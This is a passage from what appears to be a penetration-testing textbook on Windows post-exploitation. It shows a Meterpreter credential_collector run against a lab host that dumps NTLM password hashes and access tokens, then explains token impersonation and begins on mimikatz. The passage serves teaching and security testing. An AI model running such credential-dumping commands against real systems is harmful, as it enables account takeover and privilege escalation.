mation about the account associated with a process or thread. These tokens could be
used to impersonate another user because the token could be used as a way of gaining
access with the permissions of the user whose token has been grabbed.
Example 6-10
shows the run of
check_credentials
with a portion of the password hashes and the
tokens that were pulled.
Example 6-10. Running check_credentials
meterpreter > run post/windows/gather/credentials/credential_collector
[
*
]
Running module against VAGRANT-2008R2
[
+
]
Collecting hashes...
Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c
245d35b50b
Extracted: anakin_skywalker:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e5
5cde2f3de94fa
Extracted: artoo_detoo:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea6
3b7577b4
Extracted: leia_organa:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f
21f14028
Extracted: luke_skywalker:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0
e9bac82005a
Extracted: sshd:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: sshd_server:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d0
0ec27035
Extracted: vagrant:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35
b50b
[
+
]
Collecting tokens...
NT AUTHORITY
\L
OCAL SERVICE
NT AUTHORITY
\N
ETWORK SERVICE
NT AUTHORITY
\S
YSTEM
VAGRANT-2008R2
\s
shd_server
NT AUTHORITY
\A
NONYMOUS LOGON
meterpreter >
Some of the tokens that were extracted are common ones used for services that are
running on a Windows system. The Local Service account is one that is used by the
service control manager, and it has a high level of permissions on the local system. It
would have no privileges within the context of a Windows domain, so you couldn’t
use it across multiple systems. However, if you compromise a system running with
this account, you will essentially have administrative permissions.
A post-exploitation module available to run in Meterpreter is
mimikatz
. The
mimi‐
katz
module includes functions related to acquiring passwords. While you can get the
majority of these in other ways,
mimikatz
provides another mechanism to get creden‐
tials. It’s also a one-stop shop for ways to get credentials from different sources,
including the SAM, as well as from memory. Before we do anything, we need to
load
mimikatz
. Once the mimikatz module is loaded, we use the
mimikatz_command
to
